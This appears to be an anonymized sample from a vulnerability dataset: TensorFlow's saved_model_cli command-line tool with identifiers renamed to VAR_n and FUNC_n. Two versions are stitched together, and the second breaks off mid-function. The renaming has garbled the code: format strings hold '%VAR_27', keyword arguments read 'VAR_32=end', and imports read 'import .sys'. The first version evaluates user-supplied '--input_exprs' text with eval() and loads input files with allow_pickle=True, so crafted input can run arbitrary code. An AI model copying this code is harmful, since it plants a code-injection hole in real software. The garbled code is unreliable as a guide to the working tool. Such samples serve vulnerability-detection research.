FUNC_6(VAR_20, VAR_6=4)
if VAR_76:
FUNC_6(VAR_76, 'Named Argument', VAR_6=4)
def FUNC_6(VAR_7, VAR_8='Argument', VAR_6=0):
VAR_26 = ' ' * VAR_6
def FUNC_31(VAR_31):
VAR_63 = '\'' * isinstance(VAR_31, str)
return VAR_63 + str(VAR_31) + VAR_63
def FUNC_30(VAR_27, VAR_32='\n'):
print(VAR_26 + VAR_27, VAR_32=end)
for index, element in enumerate(VAR_7, 1):
if VAR_6 == 4:
FUNC_30('%VAR_27 #%d' % (VAR_8, index))
if isinstance(element, six.string_types):
FUNC_30(' %s' % element)
elif isinstance(element, tensor_spec.TensorSpec):
print((VAR_6 + 1) * ' ' + '%VAR_27: %s' % (element.name, repr(element)))
elif (isinstance(element, collections_abc.Iterable) and
not isinstance(element, dict)):
FUNC_30(' DType: %s' % type(element).__name__)
FUNC_30(' Value: [', VAR_32='')
for VAR_31 in element:
print('%s' % FUNC_31(VAR_31), VAR_32=', ')
print('\b\b]')
elif isinstance(element, dict):
FUNC_30(' DType: %s' % type(element).__name__)
FUNC_30(' Value: {', VAR_32='')
for (key, VAR_31) in element.items():
print('\'%VAR_27\': %s' % (str(key), FUNC_31(VAR_31)), VAR_32=', ')
print('\b\b}')
else:
FUNC_30(' DType: %s' % type(element).__name__)
FUNC_30(' Value: %s' % str(element))
def FUNC_7(VAR_9, VAR_6=0):
VAR_26 = ' ' * VAR_6
def FUNC_30(VAR_27):
print(VAR_26 + VAR_27)
FUNC_30(' dtype: ' +
{VAR_31: key
for (key, VAR_31) in types_pb2.DataType.items()}[VAR_9.dtype])
if VAR_9.tensor_shape.unknown_rank:
VAR_64 = 'unknown_rank'
else:
VAR_65 = [str(dim.size) for dim in VAR_9.tensor_shape.dim]
VAR_64 = ', '.join(VAR_65)
VAR_64 = '(' + VAR_64 + ')'
FUNC_30(' VAR_64: ' + VAR_64)
FUNC_30(' name: ' + VAR_9.name)
def FUNC_8(VAR_2):
VAR_22 = saved_model_utils.get_saved_model_tag_sets(VAR_2)
for VAR_3 in sorted(VAR_22):
print("\nMetaGraphDef with tag-set: '%s' "
"contains the following SignatureDefs:" % ', '.join(VAR_3))
VAR_3 = ','.join(VAR_3)
VAR_23 = FUNC_10(VAR_2, VAR_3)
for VAR_5 in sorted(VAR_23.keys()):
print('\nsignature_def[\'' + VAR_5 + '\']:')
FUNC_4(VAR_2, VAR_3, VAR_5,
VAR_6=1)
FUNC_5(VAR_2)
def FUNC_9(VAR_2, VAR_3):
return saved_model_utils.get_meta_graph_def(VAR_2, VAR_3)
def FUNC_10(VAR_2, VAR_3):
VAR_33 = saved_model_utils.get_meta_graph_def(VAR_2, VAR_3)
return VAR_33.signature_def
def FUNC_11(VAR_4):
VAR_34 = set(
meta_graph_lib.ops_used_by_graph_def(VAR_4.graph_def))
VAR_35 = VAR_1 & VAR_34
if VAR_35:
print(
'MetaGraph with tag set %VAR_27 contains the following denylisted ops:' %
VAR_4.meta_info_def.tags, VAR_35)
else:
print('MetaGraph with tag set %VAR_27 does not contain denylisted ops.' %
VAR_4.meta_info_def.tags)
def FUNC_12(VAR_2, VAR_3, VAR_5,
VAR_10, VAR_11,
VAR_12, VAR_13=None, VAR_14=False,
VAR_15=False):
VAR_4 = saved_model_utils.get_meta_graph_def(VAR_2,
VAR_3)
VAR_24 = FUNC_2(
VAR_4, VAR_5)
for input_key_name in VAR_10.keys():
if input_key_name not in VAR_24:
raise ValueError(
'"%s" is not a valid input key. Please choose from %VAR_27, or use '
'--FUNC_18 option.' %
(input_key_name, '"' + '", "'.join(VAR_24.keys()) + '"'))
VAR_36 = {
VAR_24[key].name: tensor
for key, tensor in VAR_10.items()
}
VAR_25 = FUNC_3(
VAR_4, VAR_5)
VAR_37 = sorted(VAR_25.keys())
VAR_38 = [
VAR_25[tensor_key].name
for tensor_key in VAR_37
]
with session.Session(VAR_13, graph=ops_lib.Graph()) as VAR_77:
if VAR_14:
print('Initializing TPU System ...')
VAR_77.run(tpu.initialize_system())
loader.load(VAR_77, VAR_3.split(','), VAR_2)
if VAR_15:
VAR_77 = local_cli_wrapper.LocalCLIDebugWrapperSession(VAR_77)
VAR_66 = VAR_77.run(VAR_38, feed_dict=VAR_36)
for i, output in enumerate(VAR_66):
VAR_78 = VAR_37[i]
print('Result for output key %VAR_27:\n%s' % (VAR_78, output))
if VAR_11:
if not os.path.isdir(VAR_11):
os.makedirs(VAR_11)
VAR_79 = os.path.join(VAR_11, VAR_78 + '.npy')
if not VAR_12 and os.path.exists(VAR_79):
raise RuntimeError(
'Output file %VAR_27 already exists. Add \"--overwrite\" to overwrite'
' the existing output files.' % VAR_79)
np.save(VAR_79, output)
print('Output %VAR_27 is saved to %s' % (VAR_78,
VAR_79))
def FUNC_13(VAR_16):
VAR_39 = {}
VAR_40 = VAR_16.split(';')
for input_raw in filter(bool, VAR_40): # skip empty strings
VAR_67 = re.match(r'([^=]+)=([^\[\]]+)\[([^\[\]]+)\]$', input_raw)
if VAR_67:
VAR_39[VAR_67.group(1)] = VAR_67.group(2), VAR_67.group(3)
else:
VAR_67 = re.match(r'([^=]+)=([^\[\]]+)$', input_raw)
if VAR_67:
VAR_39[VAR_67.group(1)] = VAR_67.group(2), None
else:
raise RuntimeError(
'--VAR_43 "%s" format is incorrect. Please follow'
'"<VAR_68>=<filename>", or'
'"<VAR_68>=<filename>[<variable_name>]"' % input_raw)
return VAR_39
def FUNC_14(VAR_17):
VAR_39 = {}
for input_raw in filter(bool, VAR_17.split(';')):
if '=' not in VAR_17:
raise RuntimeError('--VAR_44 "%s" format is incorrect. Please follow'
'"<VAR_68>=<python expression>"' % VAR_17)
VAR_68, VAR_69 = input_raw.split('=', 1)
VAR_39[VAR_68] = eval(VAR_69) # pylint: disable=eval-used
return VAR_39
def FUNC_15(VAR_18):
VAR_39 = FUNC_14(VAR_18)
for VAR_68, example_list in VAR_39.items():
if not isinstance(example_list, list):
raise ValueError(
'tf.Example input must be a list of dictionaries, but "%s" is %s' %
(example_list, type(example_list)))
VAR_39[VAR_68] = [
FUNC_16(VAR_41) for VAR_41 in example_list
]
return VAR_39
def FUNC_16(VAR_19):
VAR_41 = example_pb2.Example()
for feature_name, feature_list in VAR_19.items():
if not isinstance(feature_list, list):
raise ValueError('feature VAR_31 must be a list, but %VAR_27: "%s" is %s' %
(feature_name, feature_list, type(feature_list)))
if isinstance(feature_list[0], float):
VAR_41.features.feature[feature_name].float_list.value.extend(
feature_list)
elif isinstance(feature_list[0], str):
VAR_41.features.feature[feature_name].bytes_list.value.extend(
[f.encode('utf8') for f in feature_list])
elif isinstance(feature_list[0], bytes):
VAR_41.features.feature[feature_name].bytes_list.value.extend(
feature_list)
elif isinstance(feature_list[0], six.integer_types):
VAR_41.features.feature[feature_name].int64_list.value.extend(
feature_list)
else:
raise ValueError(
'Type %VAR_27 for VAR_31 %VAR_27 is not supported for tf.train.Feature.' %
(type(feature_list[0]), feature_list[0]))
return VAR_41.SerializeToString()
def FUNC_17(VAR_16, VAR_17,
VAR_18):
VAR_42 = {}
VAR_43 = FUNC_13(VAR_16)
VAR_44 = FUNC_14(VAR_17)
VAR_45 = FUNC_15(VAR_18)
for VAR_71, (filename, variable_name) in VAR_43.items():
VAR_70 = np.load(file_io.FileIO(filename, mode='rb'), allow_pickle=True) # pylint: disable=unexpected-keyword-arg
if variable_name:
if isinstance(VAR_70, np.ndarray):
logging.warn(
'Input file %VAR_27 contains a single ndarray. Name key \"%VAR_27\" ignored.'
% (filename, variable_name))
VAR_42[VAR_71] = VAR_70
else:
if variable_name in VAR_70:
VAR_42[VAR_71] = VAR_70[variable_name]
else:
raise RuntimeError(
'Input file %VAR_27 does not contain variable with name \"%VAR_27\".' %
(filename, variable_name))
else:
if isinstance(VAR_70, np.lib.npyio.NpzFile):
VAR_80 = VAR_70.files
if len(VAR_80) != 1:
raise RuntimeError(
'Input file %VAR_27 contains more than one ndarrays. Please specify '
'the name of ndarray to use.' % filename)
VAR_42[VAR_71] = VAR_70[VAR_80[0]]
else:
VAR_42[VAR_71] = VAR_70
for VAR_71, py_expr_evaluated in VAR_44.items():
if VAR_71 in VAR_42:
logging.warn(
'input_key %VAR_27 has been specified with both --VAR_43 and --input_exprs'
' options. Value in --VAR_44 will be used.' % VAR_71)
VAR_42[VAR_71] = py_expr_evaluated
for VAR_71, VAR_41 in VAR_45.items():
if VAR_71 in VAR_42:
logging.warn(
'input_key %VAR_27 has been specified in multiple options. Value in '
'--VAR_45 will be used.' % VAR_71)
VAR_42[VAR_71] = VAR_41
return VAR_42
def FUNC_18(VAR_20):
if VAR_20.all:
FUNC_8(VAR_20.dir)
else:
if VAR_20.tag_set is None:
FUNC_0(VAR_20.dir)
else:
if VAR_20.signature_def is None:
FUNC_1(VAR_20.dir, VAR_20.tag_set)
else:
FUNC_4(VAR_20.dir, VAR_20.tag_set, VAR_20.signature_def)
def FUNC_19(VAR_20):
if not VAR_20.inputs and not VAR_20.input_exprs and not VAR_20.input_examples:
raise AttributeError(
'At least one of --VAR_43, --VAR_44 or --VAR_45 must be '
'required')
VAR_42 = FUNC_17(
VAR_20.inputs, VAR_20.input_exprs, VAR_20.input_examples)
FUNC_12(VAR_20.dir, VAR_20.tag_set, VAR_20.signature_def,
VAR_42, VAR_20.outdir,
VAR_20.overwrite, VAR_13=VAR_20.worker,
VAR_14=VAR_20.init_tpu, VAR_15=VAR_20.tf_debug)
def FUNC_20(VAR_20):
if VAR_20.tag_set:
FUNC_11(
saved_model_utils.get_meta_graph_def(VAR_20.dir, VAR_20.tag_set))
else:
VAR_72 = saved_model_utils.read_saved_model(VAR_20.dir)
for VAR_4 in VAR_72.meta_graphs:
FUNC_11(VAR_4)
def FUNC_21(VAR_20):
from tensorflow.python.compiler.tensorrt import trt_convert as trt # pylint: disable=g-import-not-at-top
if not VAR_20.convert_tf1_model:
VAR_73 = trt.DEFAULT_TRT_CONVERSION_PARAMS._replace(
max_workspace_size_bytes=VAR_20.max_workspace_size_bytes,
precision_mode=VAR_20.precision_mode,
minimum_segment_size=VAR_20.minimum_segment_size)
VAR_74 = trt.TrtGraphConverterV2(
input_saved_model_dir=VAR_20.dir,
input_saved_model_tags=VAR_20.tag_set.split(','),
conversion_params=VAR_73)
try:
VAR_74.convert()
except Exception as e:
raise RuntimeError(
'{}. Try passing "--convert_tf1_model=True".'.format(e))
VAR_74.save(output_saved_model_dir=VAR_20.output_dir)
else:
trt.create_inference_graph(
None,
None,
max_batch_size=1,
max_workspace_size_bytes=VAR_20.max_workspace_size_bytes,
precision_mode=VAR_20.precision_mode,
minimum_segment_size=VAR_20.minimum_segment_size,
is_dynamic_op=True,
input_saved_model_dir=VAR_20.dir,
input_saved_model_tags=VAR_20.tag_set.split(','),
output_saved_model_dir=VAR_20.output_dir)
def FUNC_22(VAR_20):
VAR_46 = (
VAR_20.checkpoint_path
or os.path.join(VAR_20.dir, 'variables/variables'))
if not VAR_20.variables_to_feed:
VAR_75 = []
elif VAR_20.variables_to_feed.lower() == 'all':
VAR_75 = None # We will identify them after.
else:
VAR_75 = VAR_20.variables_to_feed.split(',')
saved_model_aot_compile.aot_compile_cpu_meta_graph_def(
VAR_46=checkpoint_path,
VAR_4=saved_model_utils.get_meta_graph_def(
VAR_20.dir, VAR_20.tag_set),
VAR_5=VAR_20.signature_def_key,
VAR_75=variables_to_feed,
output_prefix=VAR_20.output_prefix,
target_triple=VAR_20.target_triple,
target_cpu=VAR_20.target_cpu,
cpp_class=VAR_20.cpp_class,
multithreading=VAR_20.multithreading.lower() not in ('f', 'false', '0'))
def FUNC_23(VAR_21):
VAR_47 = (
'Usage examples:\n'
'To FUNC_18 all tag-sets in a SavedModel:\n'
'$saved_model_cli FUNC_18 --dir /tmp/VAR_72\n\n'
'To FUNC_18 all available SignatureDef keys in a '
'MetaGraphDef specified by its tag-set:\n'
'$saved_model_cli FUNC_18 --dir /tmp/VAR_72 --VAR_3 serve\n\n'
'For a MetaGraphDef with multiple tags in the tag-set, all tags must be '
'passed in, separated by \';\':\n'
'$saved_model_cli FUNC_18 --dir /tmp/VAR_72 --VAR_3 serve,gpu\n\n'
'To FUNC_18 all VAR_43 and VAR_66 TensorInfo for a specific'
' SignatureDef specified by the SignatureDef key in a'
' MetaGraph.\n'
'$saved_model_cli FUNC_18 --dir /tmp/VAR_72 --VAR_3 serve'
' --signature_def serving_default\n\n'
'To FUNC_18 all available information in the SavedModel:\n'
'$saved_model_cli FUNC_18 --dir /tmp/VAR_72 --all')
VAR_48 = VAR_21.add_parser(
'show',
description=VAR_47,
formatter_class=argparse.RawTextHelpFormatter)
VAR_48.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to inspect')
VAR_48.add_argument(
'--all',
action='store_true',
help='if set, will output all information in given SavedModel')
VAR_48.add_argument(
'--tag_set',
type=str,
default=None,
help='tag-set of graph in SavedModel to FUNC_18, separated by \',\'')
VAR_48.add_argument(
'--signature_def',
type=str,
default=None,
metavar='SIGNATURE_DEF_KEY',
help='key of SignatureDef to display input(VAR_27) and output(VAR_27) for')
VAR_48.set_defaults(func=FUNC_18)
def FUNC_24(VAR_21):
VAR_49 = ('Usage VAR_41:\n'
'To FUNC_19 input tensors from files through a MetaGraphDef and save'
' the output tensors to files:\n'
'$saved_model_cli FUNC_18 --dir /tmp/VAR_72 --VAR_3 serve \\\n'
' --signature_def serving_default \\\n'
' --VAR_43 input1_key=/tmp/124.npz[x],input2_key=/tmp/123.npy '
'\\\n'
' --VAR_44 \'input3_key=np.ones(2)\' \\\n'
' --VAR_45 '
'\'input4_key=[{"id":[26],"weights":[0.5, 0.5]}]\' \\\n'
' --VAR_11=/out\n\n'
'For more information about input file format, please see:\n'
'https://www.tensorflow.org/guide/saved_model_cli\n')
VAR_50 = VAR_21.add_parser(
'run', description=VAR_49, formatter_class=argparse.RawTextHelpFormatter)
VAR_50.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to execute')
VAR_50.add_argument(
'--tag_set',
type=str,
required=True,
help='tag-set of graph in SavedModel to load, separated by \',\'')
VAR_50.add_argument(
'--signature_def',
type=str,
required=True,
metavar='SIGNATURE_DEF_KEY',
help='key of SignatureDef to run')
VAR_51 = ('Loading VAR_43 from files, in the format of \'<VAR_68>=<filename>,'
' or \'<VAR_68>=<filename>[<variable_name>]\', separated by \';\'.'
' The file format can only be from .npy, .npz or pickle.')
VAR_50.add_argument('--inputs', type=str, default='', help=VAR_51)
VAR_51 = ('Specifying VAR_43 by python expressions, in the format of'
' "<VAR_68>=\'<python expression>\'", separated by \';\'. '
'numpy module is available as \'np\'. '
'Will override duplicate input keys from --VAR_43 option.')
VAR_50.add_argument('--input_exprs', type=str, default='', help=VAR_51)
VAR_51 = (
'Specifying tf.Example VAR_43 as list of dictionaries. For VAR_41: '
'<VAR_68>=[{feature0:value_list,feature1:value_list}]. Use ";" to '
'separate input keys. Will override duplicate input keys from --VAR_43 '
'and --VAR_44 option.')
VAR_50.add_argument('--input_examples', type=str, default='', help=VAR_51)
VAR_50.add_argument(
'--outdir',
type=str,
default=None,
help='if specified, output tensor(VAR_27) will be saved to given directory')
VAR_50.add_argument(
'--overwrite',
action='store_true',
help='if set, output file will be overwritten if it already exists.')
VAR_50.add_argument(
'--tf_debug',
action='store_true',
help='if set, will use TensorFlow Debugger (tfdbg) to watch the '
'intermediate Tensors and runtime GraphDefs while running the '
'SavedModel.')
VAR_50.add_argument(
'--worker',
type=str,
default=None,
help='if specified, a Session will be FUNC_19 on the VAR_13. '
'Valid VAR_13 specification is a bns or gRPC path.')
VAR_50.add_argument(
'--init_tpu',
action='store_true',
default=None,
help='if specified, tpu.initialize_system will be called on the Session. '
'This option should be only used if the VAR_13 is a TPU job.')
VAR_50.set_defaults(func=FUNC_19)
def FUNC_25(VAR_21):
VAR_52 = ('Usage VAR_41:\n'
'To FUNC_20 for denylisted ops in SavedModel:\n'
'$saved_model_cli FUNC_20 --dir /tmp/VAR_72\n'
'To FUNC_20 a specific MetaGraph, pass in --VAR_3\n')
VAR_53 = VAR_21.add_parser(
'scan',
description=VAR_52,
formatter_class=argparse.RawTextHelpFormatter)
VAR_53.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to execute')
VAR_53.add_argument(
'--tag_set',
type=str,
help='tag-set of graph in SavedModel to FUNC_20, separated by \',\'')
VAR_53.set_defaults(func=FUNC_20)
def FUNC_26(VAR_21):
VAR_54 = ('Usage VAR_41:\n'
'To convert the SavedModel to one that have TensorRT ops:\n'
'$saved_model_cli convert \\\n'
' --dir /tmp/VAR_72 \\\n'
' --VAR_3 serve \\\n'
' --output_dir /tmp/saved_model_trt \\\n'
' tensorrt \n')
VAR_55 = VAR_21.add_parser(
'convert',
description=VAR_54,
formatter_class=argparse.RawTextHelpFormatter)
VAR_55.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to convert')
VAR_55.add_argument(
'--output_dir',
type=str,
required=True,
help='output directory for the converted SavedModel')
VAR_55.add_argument(
'--tag_set',
type=str,
required=True,
help='tag-set of graph in SavedModel to convert, separated by \',\'')
VAR_56 = VAR_55.add_subparsers(
title='conversion methods',
description='valid conversion methods',
help='the conversion to FUNC_19 with the SavedModel')
VAR_57 = VAR_56.add_parser(
'tensorrt',
description='Convert the SavedModel with Tensorflow-TensorRT integration',
formatter_class=argparse.RawTextHelpFormatter)
VAR_57.add_argument(
'--max_workspace_size_bytes',
type=int,
default=2 << 20,
help=('the maximum GPU temporary memory which the TRT engine can use at '
'execution time'))
VAR_57.add_argument(
'--precision_mode',
type=str,
default='FP32',
help='one of FP32, FP16 and INT8')
VAR_57.add_argument(
'--minimum_segment_size',
type=int,
default=3,
help=('the minimum number of nodes required for a subgraph to be replaced'
'in a TensorRT node'))
VAR_57.add_argument(
'--convert_tf1_model',
type=bool,
default=False,
help='support TRT conversion for TF1 models')
VAR_57.set_defaults(func=FUNC_21)
def FUNC_27(VAR_21):
VAR_58 = '\n'.join(
['Usage VAR_41:',
'To compile a SavedModel signature via (CPU) XLA AOT:',
'$saved_model_cli FUNC_22 \\',
' --dir /tmp/VAR_72 \\',
' --VAR_3 serve \\',
' --output_dir /tmp/saved_model_xla_aot',
'', '',
'Note: Additional XLA compilation options are available by setting the ',
'XLA_FLAGS environment variable. See the XLA debug options flags for ',
'all the options: ',
' {}'.format(VAR_0),
'',
'For VAR_41, to disable XLA fast math when compiling:',
'',
'XLA_FLAGS="--xla_cpu_enable_fast_math=false" $saved_model_cli '
'aot_compile_cpu ...',
'',
'Some possibly useful flags:',
' --xla_cpu_enable_fast_math=false',
' --xla_force_host_platform_device_count=<num threads>',
' (useful in conjunction with disabling multi threading)'
])
VAR_59 = VAR_21.add_parser(
'aot_compile_cpu',
description=VAR_58,
formatter_class=argparse.RawTextHelpFormatter)
VAR_59.add_argument(
'--dir',
type=str,
required=True,
help='directory containing the SavedModel to convert')
VAR_59.add_argument(
'--output_prefix',
type=str,
required=True,
help=('output directory + filename prefix for the resulting header(VAR_27) '
'and object file(VAR_27)'))
VAR_59.add_argument(
'--tag_set',
type=str,
required=True,
help='tag-set of graph in SavedModel to convert, separated by \',\'')
VAR_59.add_argument(
'--signature_def_key',
type=str,
default=signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY,
help=('signature_def key to use. '
'default: DEFAULT_SERVING_SIGNATURE_DEF_KEY'))
VAR_59.add_argument(
'--target_triple',
type=str,
default='x86_64-pc-linux',
help=('Target triple for LLVM during AOT compilation. Examples: '
'x86_64-none-darwin, x86_64-apple-ios, arm64-none-ios, '
'armv7-none-android. More examples are available in tfcompile.bzl '
'in the tensorflow codebase.'))
VAR_59.add_argument(
'--target_cpu',
type=str,
default='',
help=('Target cpu name for LLVM during AOT compilation. Examples: '
'x86_64, skylake, haswell, westmere, <empty> (unknown). For '
'a complete list of options, FUNC_19 (for x86 targets): '
'`llc -march=x86 -mcpu=help`'))
VAR_59.add_argument(
'--checkpoint_path',
type=str,
default=None,
help='Custom checkpoint to use (default: use the SavedModel variables)')
VAR_59.add_argument(
'--cpp_class',
type=str,
required=True,
help=('The name of the generated C++ class, wrapping the generated '
'function. The syntax of this flag is '
'[[<optional_namespace>::],...]<class_name>. This mirrors the '
'C++ syntax for referring to a class, where multiple namespaces '
'may precede the class name, separated by double-colons. '
'The class will be generated in the given namespace(VAR_27), or if no '
'namespaces are given, within the global namespace.'))
VAR_59.add_argument(
'--variables_to_feed',
type=str,
default='',
help=('The names of variables that will be fed into the network. '
'Options are: empty (default; all variables are frozen, none may '
'be fed), \'all\' (all variables may be fed), or a '
'comma-delimited list of names of variables that may be fed. In '
'the last case, the non-fed variables will be frozen in the graph.'
'**NOTE** Any variables passed to `VAR_75` *must be set '
'by the user*. These variables will NOT be frozen and their '
'values will be uninitialized in the compiled object '
'(this applies to all input VAR_7 from the signature as '
'well).'))
VAR_59.add_argument(
'--multithreading',
type=str,
default='False',
help=('Enable multithreading in the compiled computation. '
'Note that if using this option, the resulting object files '
'may have external dependencies on multithreading libraries '
'like nsync.'))
VAR_59.set_defaults(func=FUNC_22)
def FUNC_28():
VAR_60 = argparse.ArgumentParser(
description='saved_model_cli: Command-line interface for SavedModel')
VAR_60.add_argument('-v', '--version', action='version', version='0.1.0')
VAR_21 = VAR_60.add_subparsers(
title='commands', description='valid commands', help='additional help')
FUNC_23(VAR_21)
FUNC_24(VAR_21)
FUNC_25(VAR_21)
FUNC_26(VAR_21)
FUNC_27(VAR_21)
return VAR_60
def FUNC_29():
logging.set_verbosity(logging.INFO)
VAR_60 = FUNC_28()
VAR_20 = VAR_60.parse_args()
if not hasattr(VAR_20, 'func'):
VAR_60.error('too few arguments')
VAR_20.func(VAR_20)
if __name__ == '__main__':
sys.exit(FUNC_29())
|
import argparse
import ast
import os
import re
import .sys
from absl import app # pylint: disable=unused-import
import numpy as np
import .six
from tensorflow.core.example import .example_pb2
from tensorflow.core.framework import types_pb2
from tensorflow.python.client import .session
from tensorflow.python.debug.wrappers import local_cli_wrapper
from tensorflow.python.eager import def_function
from tensorflow.python.eager import function as defun
from tensorflow.python.framework import .meta_graph as meta_graph_lib
from tensorflow.python.framework import ops as ops_lib
from tensorflow.python.framework import tensor_spec
from tensorflow.python.lib.io import file_io
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import load
from tensorflow.python.saved_model import loader
from tensorflow.python.saved_model import .save
from tensorflow.python.saved_model import .signature_constants
from tensorflow.python.tools import .saved_model_aot_compile
from tensorflow.python.tools import .saved_model_utils
from tensorflow.python.tpu import tpu
from tensorflow.python.util.compat import collections_abc
VAR_0 = (
'https://github.com/tensorflow/tensorflow/blob/master/'
'tensorflow/compiler/xla/debug_options_flags.cc')
VAR_1 = set(['WriteFile', 'ReadFile', 'PrintV2'])
def FUNC_0(VAR_2):
VAR_23 = saved_model_utils.get_saved_model_tag_sets(VAR_2)
print('The given SavedModel contains the following tag-sets:')
for VAR_3 in sorted(VAR_23):
print('%r' % ', '.join(sorted(VAR_3)))
def FUNC_1(VAR_2, VAR_3):
VAR_24 = FUNC_10(VAR_2, VAR_3)
print('The given SavedModel MetaGraphDef contains SignatureDefs with the '
'following keys:')
for VAR_5 in sorted(VAR_24.keys()):
print('SignatureDef key: \"%VAR_28\"' % VAR_5)
def FUNC_2(VAR_4,
VAR_5):
if VAR_5 not in VAR_4.signature_def:
raise ValueError(
f'Could not find signature "{VAR_5}". Please choose from: '
f'{", ".join(VAR_4.signature_def.keys())}')
return VAR_4.signature_def[VAR_5].inputs
def FUNC_3(VAR_4,
VAR_5):
return VAR_4.signature_def[VAR_5].outputs
def FUNC_4(VAR_2, VAR_3, VAR_5, VAR_6=0):
VAR_4 = saved_model_utils.get_meta_graph_def(VAR_2,
VAR_3)
VAR_25 = FUNC_2(
VAR_4, VAR_5)
VAR_26 = FUNC_3(
VAR_4, VAR_5)
VAR_27 = ' ' * VAR_6
def FUNC_30(VAR_28):
print(VAR_27 + VAR_28)
FUNC_30('The given SavedModel SignatureDef contains the following input(VAR_28):')
for VAR_69, input_tensor in sorted(VAR_25.items()):
FUNC_30(' VAR_44[\'%VAR_28\'] VAR_9:' % VAR_69)
FUNC_7(input_tensor, VAR_6+1)
FUNC_30('The given SavedModel SignatureDef contains the following '
'output(VAR_28):')
for output_key, output_tensor in sorted(VAR_26.items()):
FUNC_30(' VAR_67[\'%VAR_28\'] VAR_9:' % output_key)
FUNC_7(output_tensor, VAR_6+1)
FUNC_30('Method name is: %s' %
VAR_4.signature_def[VAR_5].method_name)
def FUNC_5(VAR_2):
VAR_29 = saved_model_utils.read_saved_model(VAR_2).meta_graphs
VAR_30 = False
for VAR_4 in VAR_29:
VAR_30 |= VAR_4.HasField('object_graph_def')
if not VAR_30:
return
with ops_lib.Graph().as_default():
VAR_62 = load.load(VAR_2)
print('\nDefined Functions:', VAR_33='')
VAR_31 = (
save._AugmentedGraphView(VAR_62) # pylint: disable=protected-access
.list_functions(VAR_62))
VAR_31 = sorted(VAR_31.items(), key=lambda x: x[0])
for name, function in VAR_31:
print('\n Function Name: \'%VAR_28\'' % name)
VAR_63 = []
if isinstance(function, defun.ConcreteFunction):
VAR_63.append(function)
if isinstance(function, def_function.Function):
VAR_63.extend(
function._list_all_concrete_functions_for_serialization()) # pylint: disable=protected-access
VAR_63 = sorted(VAR_63, key=lambda x: x.name)
for index, concrete_function in enumerate(VAR_63, 1):
VAR_21, VAR_77 = None, None
if concrete_function.structured_input_signature:
VAR_21, VAR_77 = concrete_function.structured_input_signature
elif concrete_function._arg_keywords: # pylint: disable=protected-access
VAR_21 = concrete_function._arg_keywords # pylint: disable=protected-access
if VAR_21:
print(' Option #%d' % index)
print(' Callable with:')
FUNC_6(VAR_21, VAR_6=4)
if VAR_77:
FUNC_6(VAR_77, 'Named Argument', VAR_6=4)
def FUNC_6(VAR_7, VAR_8='Argument', VAR_6=0):
VAR_27 = ' ' * VAR_6
def FUNC_31(VAR_32):
VAR_64 = '\'' * isinstance(VAR_32, str)
return VAR_64 + str(VAR_32) + VAR_64
def FUNC_30(VAR_28, VAR_33='\n'):
print(VAR_27 + VAR_28, VAR_33=end)
for index, element in enumerate(VAR_7, 1):
if VAR_6 == 4:
FUNC_30('%VAR_28 #%d' % (VAR_8, index))
if isinstance(element, six.string_types):
FUNC_30(' %s' % element)
elif isinstance(element, tensor_spec.TensorSpec):
print((VAR_6 + 1) * ' ' + '%VAR_28: %s' % (element.name, repr(element)))
elif (isinstance(element, collections_abc.Iterable) and
not isinstance(element, dict)):
FUNC_30(' DType: %s' % type(element).__name__)
FUNC_30(' Value: [', VAR_33='')
for VAR_32 in element:
print('%s' % FUNC_31(VAR_32), VAR_33=', ')
print('\b\b]')
elif isinstance(element, dict):
FUNC_30(' DType: %s' % type(element).__name__)
FUNC_30(' Value: {', VAR_33='')
for (key, VAR_32) in element.items():
print('\'%VAR_28\': %s' % (str(key), FUNC_31(VAR_32)), VAR_33=', ')
print('\b\b}')
else:
FUNC_30(' DType: %s' % type(element).__name__)
FUNC_30(' Value: %s' % str(element))
def FUNC_7(VAR_9, VAR_6=0):
VAR_27 = ' ' * VAR_6
def FUNC_30(VAR_28):
print(VAR_27 + VAR_28)
FUNC_30(' dtype: ' +
{VAR_32: key
for (key, VAR_32) in types_pb2.DataType.items()}[VAR_9.dtype])
if VAR_9.tensor_shape.unknown_rank:
VAR_65 = 'unknown_rank'
else:
VAR_66 = [str(dim.size) for dim in VAR_9.tensor_shape.dim]
VAR_65 = ', '.join(VAR_66)
VAR_65 = '(' + VAR_65 + ')'
FUNC_30(' VAR_65: ' + VAR_65)
FUNC_30(' name: ' + VAR_9.name)
def FUNC_8(VAR_2):
VAR_23 = saved_model_utils.get_saved_model_tag_sets(VAR_2)
for VAR_3 in sorted(VAR_23):
print("\nMetaGraphDef with tag-set: '%s' "
"contains the following SignatureDefs:" % ', '.join(VAR_3))
VAR_3 = ','.join(VAR_3)
VAR_24 = FUNC_10(VAR_2, VAR_3)
for VAR_5 in sorted(VAR_24.keys()):
print('\nsignature_def[\'' + VAR_5 + '\']:')
FUNC_4(VAR_2, VAR_3, VAR_5,
VAR_6=1)
FUNC_5(VAR_2)
def FUNC_9(VAR_2, VAR_3):
return saved_model_utils.get_meta_graph_def(VAR_2, VAR_3)
def FUNC_10(VAR_2, VAR_3):
VAR_34 = saved_model_utils.get_meta_graph_def(VAR_2, VAR_3)
return VAR_34.signature_def
def FUNC_11(VAR_4):
VAR_35 = set(
meta_graph_lib.ops_used_by_graph_def(VAR_4.graph_def))
VAR_36 = VAR_1 & VAR_35
if VAR_36:
print(
'MetaGraph with tag set %VAR_28 contains the following denylisted ops:' %
VAR_4.meta_info_def.tags, VAR_36)
else:
print('MetaGraph with tag set %VAR_28 does not contain denylisted ops.' %
VAR_4.meta_info_def.tags)
def FUNC_12(VAR_2, VAR_3, VAR_5,
VAR_10, VAR_11,
VAR_12, VAR_13=None, VAR_14=False,
VAR_15=False):
VAR_4 = saved_model_utils.get_meta_graph_def(VAR_2,
VAR_3)
VAR_25 = FUNC_2(
VAR_4, VAR_5)
for input_key_name in VAR_10.keys():
if input_key_name not in VAR_25:
raise ValueError(
'"%s" is not a valid input key. Please choose from %VAR_28, or use '
'--FUNC_18 option.' %
(input_key_name, '"' + '", "'.join(VAR_25.keys()) + '"'))
VAR_37 = {
VAR_25[key].name: tensor
for key, tensor in VAR_10.items()
}
VAR_26 = FUNC_3(
VAR_4, VAR_5)
VAR_38 = sorted(VAR_26.keys())
VAR_39 = [
VAR_26[tensor_key].name
for tensor_key in VAR_38
]
with session.Session(VAR_13, graph=ops_lib.Graph()) as VAR_78:
if VAR_14:
print('Initializing TPU System ...')
